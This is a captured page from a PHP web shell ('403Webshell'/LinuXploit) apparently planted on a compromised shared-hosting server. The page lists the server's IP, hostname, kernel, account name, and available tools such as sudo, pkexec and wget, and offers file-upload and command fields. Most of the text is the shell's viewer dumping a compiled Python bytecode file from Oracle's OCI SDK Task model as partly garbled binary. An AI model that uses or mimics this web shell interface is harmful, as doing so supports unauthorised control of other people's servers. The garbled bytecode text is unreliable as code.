403Webshell
Server IP : 162.241.203.86  /  Your IP : 216.73.217.87
Web Server : Apache
System : Linux br1002.hostgator.com.br 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
User : luxlic01 ( 6532)
PHP Version : 8.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3.9/site-packages/oci/data_integration/models/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.9/site-packages/oci/data_integration/models/__pycache__/task.cpython-39.pyc
a

���f�Q�@s8ddlmZmZmZddlmZeGdd�de��ZdS)�)�formatted_flat_dict�
NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc@s(eZdZdZdZdZdZdZdZdZ	dd	�Z
ed
d��Ze
dd
��Zejdd
��Ze
dd��Zejdd��Ze
dd��Zejdd��Ze
dd��Zejdd��Ze
dd��Zejdd��Ze
dd��Zejdd��Ze
dd��Zejd d��Ze
d!d"��Zejd#d"��Ze
d$d%��Zejd&d%��Ze
d'd(��Zejd)d(��Ze
d*d+��Zejd,d+��Ze
d-d.��Zejd/d.��Ze
d0d1��Zejd2d1��Ze
d3d4��Zejd5d4��Ze
d6d7��Zejd8d7��Ze
d9d:��Zejd;d:��Ze
d<d=��Zejd>d=��Ze
d?d@��Z e jdAd@��Z dBdC�Z!dDdE�Z"dFdG�Z#dHS)I�Taskz^
    The task type contains the audit summary information and the definition of the task.
    �INTEGRATION_TASK�DATA_LOADER_TASK�
PIPELINE_TASK�SQL_TASK�OCI_DATAFLOW_TASK�	REST_TASKcKs�ddddddddddddddd	d
ddd
�|_ddddddddddddddddddd
�|_d |_d |_d |_d |_d |_d |_d |_d |_	d |_
d |_d |_d |_
d |_d |_d |_d |_d |_d |_d S)!a,
        Initializes a new Task object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
        to a service operations then you should favor using a subclass over the base class:

        * :class:`~oci.data_integration.models.TaskFromPipelineTaskDetails`
        * :class:`~oci.data_integration.models.TaskFromIntegrationTaskDetails`
        * :class:`~oci.data_integration.models.TaskFromSQLTaskDetails`
        * :class:`~oci.data_integration.models.TaskFromRestTaskDetails`
        * :class:`~oci.data_integration.models.TaskFromOCIDataflowTaskDetails`
        * :class:`~oci.data_integration.models.TaskFromDataLoaderTaskDetails`

        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param model_type:
            The value to assign to the model_type property of this Task.
            Allowed values for this property are: "INTEGRATION_TASK", "DATA_LOADER_TASK", "PIPELINE_TASK", "SQL_TASK", "OCI_DATAFLOW_TASK", "REST_TASK", 'UNKNOWN_ENUM_VALUE'.
            Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
        :type model_type: str

        :param key:
            The value to assign to the key property of this Task.
        :type key: str

        :param model_version:
            The value to assign to the model_version property of this Task.
        :type model_version: str

        :param parent_ref:
            The value to assign to the parent_ref property of this Task.
        :type parent_ref: oci.data_integration.models.ParentReference

        :param name:
            The value to assign to the name property of this Task.
        :type name: str

        :param description:
            The value to assign to the description property of this Task.
        :type description: str

        :param object_version:
            The value to assign to the object_version property of this Task.
        :type object_version: int

        :param object_status:
            The value to assign to the object_status property of this Task.
        :type object_status: int

        :param identifier:
            The value to assign to the identifier property of this Task.
        :type identifier: str

        :param input_ports:
            The value to assign to the input_ports property of this Task.
        :type input_ports: list[oci.data_integration.models.InputPort]

        :param output_ports:
            The value to assign to the output_ports property of this Task.
        :type output_ports: list[oci.data_integration.models.OutputPort]

        :param parameters:
            The value to assign to the parameters property of this Task.
        :type parameters: list[oci.data_integration.models.Parameter]

        :param op_config_values:
            The value to assign to the op_config_values property of this Task.
        :type op_config_values: oci.data_integration.models.ConfigValues

        :param config_provider_delegate:
            The value to assign to the config_provider_delegate property of this Task.
        :type config_provider_delegate: oci.data_integration.models.ConfigProvider

        :param is_concurrent_allowed:
            The value to assign to the is_concurrent_allowed property of this Task.
        :type is_concurrent_allowed: bool

        :param metadata:
            The value to assign to the metadata property of this Task.
        :type metadata: oci.data_integration.models.ObjectMetadata

        :param key_map:
            The value to assign to the key_map property of this Task.
        :type key_map: dict(str, str)

        :param registry_metadata:
            The value to assign to the registry_metadata property of this Task.
        :type registry_metadata: oci.data_integration.models.RegistryMetadata

        �strZParentReference�intzlist[InputPort]zlist[OutputPort]zlist[Parameter]ZConfigValuesZConfigProvider�boolZObjectMetadatazdict(str, str)ZRegistryMetadata)�
model_type�key�
model_version�
parent_ref�name�description�object_version�
object_status�
identifier�input_ports�output_ports�
parameters�op_config_values�config_provider_delegate�is_concurrent_allowed�metadata�key_map�registry_metadata�	modelTyperZmodelVersionZ	parentRefrrZ
objectVersionZobjectStatusrZ
inputPortsZoutputPortsrZopConfigValuesZconfigProviderDelegateZisConcurrentAllowedrZkeyMapZregistryMetadataN)Z
swagger_typesZ
attribute_map�_model_type�_key�_model_version�_parent_ref�_name�_description�_object_version�_object_status�_identifier�_input_ports�
_output_ports�_parameters�_op_config_values�_config_provider_delegate�_is_concurrent_allowed�	_metadata�_key_map�_registry_metadata)�self�kwargs�r7�D/usr/lib/python3.9/site-packages/oci/data_integration/models/task.py�__init__*spZ��z
Task.__init__cCsX|d}|dkrdS|dkr dS|dkr,dS|dkr8d	S|d
krDdS|dkrPd
SdSdS)z�
        Given the hash representation of a subtype of this class,
        use the info in the hash to return the class of the subtype.
        r"r	ZTaskFromPipelineTaskDetailsrZTaskFromIntegrationTaskDetailsr
ZTaskFromSQLTaskDetailsrZTaskFromRestTaskDetailsrZTaskFromOCIDataflowTaskDetailsrZTaskFromDataLoaderTaskDetailsrNr7)Zobject_dictionary�typer7r7r8�get_subtype�szTask.get_subtypecCs|jS)a�
        Gets the model_type of this Task.
        The type of the task.

        Allowed values for this property are: "INTEGRATION_TASK", "DATA_LOADER_TASK", "PIPELINE_TASK", "SQL_TASK", "OCI_DATAFLOW_TASK", "REST_TASK", 'UNKNOWN_ENUM_VALUE'.
        Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.


        :return: The model_type of this Task.
        :rtype: str
        )r#�r5r7r7r8r�s
zTask.model_typecCs gd�}t||�sd}||_dS)z�
        Sets the model_type of this Task.
        The type of the task.


        :param model_type: The model_type of this Task.
        :type: str
        )rrr	r
rrZUNKNOWN_ENUM_VALUEN)rr#)r5rZallowed_valuesr7r7r8r�s

cCs|jS)a
        Gets the key of this Task.
        Generated key that can be used in API calls to identify task. On scenarios where reference to the task is needed, a value can be passed in create.


        :return: The key of this Task.
        :rtype: str
        �r$r<r7r7r8r�s
zTask.keycCs
||_dS)a
        Sets the key of this Task.
        Generated key that can be used in API calls to identify task. On scenarios where reference to the task is needed, a value can be passed in create.


        :param key: The key of this Task.
        :type: str
        Nr=)r5rr7r7r8rs
cCs|jS)z�
        Gets the model_version of this Task.
        The object's model version.


        :return: The model_version of this Task.
        :rtype: str
        �r%r<r7r7r8rs
zTask.model_versioncCs
||_dS)z�
        Sets the model_version of this Task.
        The object's model version.


        :param model_version: The model_version of this Task.
        :type: str
        Nr>)r5rr7r7r8rs
cCs|jS)z�
        Gets the parent_ref of this Task.

        :return: The parent_ref of this Task.
        :rtype: oci.data_integration.models.ParentReference
        �r&r<r7r7r8r*szTask.parent_refcCs
||_dS)z�
        Sets the parent_ref of this Task.

        :param parent_ref: The parent_ref of this Task.
        :type: oci.data_integration.models.ParentReference
        Nr?)r5rr7r7r8r4scCs|jS)a'
        Gets the name of this Task.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :return: The name of this Task.
        :rtype: str
        �r'r<r7r7r8r>s
z	Task.namecCs
||_dS)a*
        Sets the name of this Task.
        Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.


        :param name: The name of this Task.
        :type: str
        Nr@)r5rr7r7r8rJs
cCs|jS)z�
        Gets the description of this Task.
        Detailed description for the object.


        :return: The description of this Task.
        :rtype: str
        �r(r<r7r7r8rVs
zTask.descriptioncCs
||_dS)z�
        Sets the description of this Task.
        Detailed description for the object.


        :param description: The description of this Task.
        :type: str
        NrA)r5rr7r7r8rbs
cCs|jS)z�
        Gets the object_version of this Task.
        The version of the object that is used to track changes in the object instance.


        :return: The object_version of this Task.
        :rtype: int
        �r)r<r7r7r8rns
zTask.object_versioncCs
||_dS)z�
        Sets the object_version of this Task.
        The version of the object that is used to track changes in the object instance.


        :param object_version: The object_version of this Task.
        :type: int
        NrB)r5rr7r7r8rzs
cCs|jS)z�
        Gets the object_status of this Task.
        The status of an object that can be set to value 1 for shallow references across objects, other values reserved.


        :return: The object_status of this Task.
        :rtype: int
        �r*r<r7r7r8r�s
zTask.object_statuscCs
||_dS)a
        Sets the object_status of this Task.
        The status of an object that can be set to value 1 for shallow references across objects, other values reserved.


        :param object_status: The object_status of this Task.
        :type: int
        NrC)r5rr7r7r8r�s
cCs|jS)a
        Gets the identifier of this Task.
        Value can only contain upper case letters, underscore, and numbers. It should begin with upper case letter or underscore. The value can be modified.


        :return: The identifier of this Task.
        :rtype: str
        �r+r<r7r7r8r�s
zTask.identifiercCs
||_dS)a
        Sets the identifier of this Task.
        Value can only contain upper case letters, underscore, and numbers. It should begin with upper case letter or underscore. The value can be modified.


        :param identifier: The identifier of this Task.
        :type: str
        NrD)r5rr7r7r8r�s
cCs|jS)z�
        Gets the input_ports of this Task.
        An array of input ports.


        :return: The input_ports of this Task.
        :rtype: list[oci.data_integration.models.InputPort]
        �r,r<r7r7r8r�s
zTask.input_portscCs
||_dS)z�
        Sets the input_ports of this Task.
        An array of input ports.


        :param input_ports: The input_ports of this Task.
        :type: list[oci.data_integration.models.InputPort]
        NrE)r5rr7r7r8r�s
cCs|jS)z�
        Gets the output_ports of this Task.
        An array of output ports.


        :return: The output_ports of this Task.
        :rtype: list[oci.data_integration.models.OutputPort]
        �r-r<r7r7r8r�s
zTask.output_portscCs
||_dS)z�
        Sets the output_ports of this Task.
        An array of output ports.


        :param output_ports: The output_ports of this Task.
        :type: list[oci.data_integration.models.OutputPort]
        NrF)r5rr7r7r8r�s
cCs|jS)z�
        Gets the parameters of this Task.
        An array of parameters.


        :return: The parameters of this Task.
        :rtype: list[oci.data_integration.models.Parameter]
        �r.r<r7r7r8r�s
zTask.parameterscCs
||_dS)z�
        Sets the parameters of this Task.
        An array of parameters.


        :param parameters: The parameters of this Task.
        :type: list[oci.data_integration.models.Parameter]
        NrG)r5rr7r7r8r�s
cCs|jS)z�
        Gets the op_config_values of this Task.

        :return: The op_config_values of this Task.
        :rtype: oci.data_integration.models.ConfigValues
        �r/r<r7r7r8r�szTask.op_config_valuescCs
||_dS)z�
        Sets the op_config_values of this Task.

        :param op_config_values: The op_config_values of this Task.
        :type: oci.data_integration.models.ConfigValues
        NrH)r5rr7r7r8rscCs|jS)z�
        Gets the config_provider_delegate of this Task.

        :return: The config_provider_delegate of this Task.
        :rtype: oci.data_integration.models.ConfigProvider
        �r0r<r7r7r8rszTask.config_provider_delegatecCs
||_dS)z�
        Sets the config_provider_delegate of this Task.

        :param config_provider_delegate: The config_provider_delegate of this Task.
        :type: oci.data_integration.models.ConfigProvider
        NrI)r5rr7r7r8rscCs|jS)z�
        Gets the is_concurrent_allowed of this Task.
        Whether the same task can be executed concurrently.


        :return: The is_concurrent_allowed of this Task.
        :rtype: bool
        �r1r<r7r7r8r&s
zTask.is_concurrent_allowedcCs
||_dS)z�
        Sets the is_concurrent_allowed of this Task.
        Whether the same task can be executed concurrently.


        :param is_concurrent_allowed: The is_concurrent_allowed of this Task.
        :type: bool
        NrJ)r5rr7r7r8r2s
cCs|jS)z�
        Gets the metadata of this Task.

        :return: The metadata of this Task.
        :rtype: oci.data_integration.models.ObjectMetadata
        �r2r<r7r7r8r>sz
Task.metadatacCs
||_dS)z�
        Sets the metadata of this Task.

        :param metadata: The metadata of this Task.
        :type: oci.data_integration.models.ObjectMetadata
        NrK)r5rr7r7r8rHscCs|jS)a

        Gets the key_map of this Task.
        A key map. If provided, key is replaced with generated key. This structure provides mapping between user provided key and generated key.


        :return: The key_map of this Task.
        :rtype: dict(str, str)
        �r3r<r7r7r8r Rs
zTask.key_mapcCs
||_dS)a
        Sets the key_map of this Task.
        A key map. If provided, key is replaced with generated key. This structure provides mapping between user provided key and generated key.


        :param key_map: The key_map of this Task.
        :type: dict(str, str)
        NrL)r5r r7r7r8r ^s
cCs|jS)z�
        Gets the registry_metadata of this Task.

        :return: The registry_metadata of this Task.
        :rtype: oci.data_integration.models.RegistryMetadata
        �r4r<r7r7r8r!jszTask.registry_metadatacCs
||_dS)z�
        Sets the registry_metadata of this Task.

        :param registry_metadata: The registry_metadata of this Task.
        :type: oci.data_integration.models.RegistryMetadata
        NrM)r5r!r7r7r8r!tscCst|�S�N)rr<r7r7r8�__repr__~sz
Task.__repr__cCs|durdS|j|jkS)NF)�__dict__�r5�otherr7r7r8�__eq__�szTask.__eq__cCs
||kSrNr7rQr7r7r8�__ne__�szTask.__ne__N)$�__name__�
__module__�__qualname__�__doc__ZMODEL_TYPE_INTEGRATION_TASKZMODEL_TYPE_DATA_LOADER_TASKZMODEL_TYPE_PIPELINE_TASKZMODEL_TYPE_SQL_TASKZMODEL_TYPE_OCI_DATAFLOW_TASKZMODEL_TYPE_REST_TASKr9�staticmethodr;�propertyr�setterrrrrrrrrrrrrrrrr r!rOrSrTr7r7r7r8rs�







	
	
















	
	
	
	


	
	


	
	rN)Zoci.utilrrrZoci.decoratorsr�objectrr7r7r7r8�<module>s

Youez - 2016 - github.com/yon3zu
LinuXploit